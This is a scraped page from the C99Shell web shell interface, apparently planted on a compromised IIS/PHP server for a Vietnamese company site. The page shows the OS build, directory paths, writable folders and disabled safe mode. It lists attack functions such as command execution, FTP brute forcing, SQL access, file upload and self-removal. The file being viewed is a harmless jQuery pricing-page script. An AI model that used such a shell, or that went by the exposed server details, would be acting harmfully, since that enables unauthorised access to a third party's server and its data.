!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

D:\vhosts\traduong.com.vn\admin.traduong.com.vn\Content\admin\assets\es6\pages\   drwxrwxrwx
Free 185.08 GB of 400 GB (46.27%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pricing.js (642 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
class PagesPricing {

    static init() {

        $('#monthly-btn').on('click', (e) => {
            $('#monthly-view').removeClass('d-none');
            $('#annual-view').addClass('d-none')
            $(e.currentTarget).addClass('active');
            $('#annual-btn').removeClass('active');
        })

        $('#annual-btn').on('click', (e) => {
            $('#annual-view').removeClass('d-none');
            $('#monthly-view').addClass('d-none');
            $(e.currentTarget).addClass('active');
            $('#list-view-btn').removeClass('active');
        })
    }
}

$(() => { PagesPricing.init(); });


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5728 ]--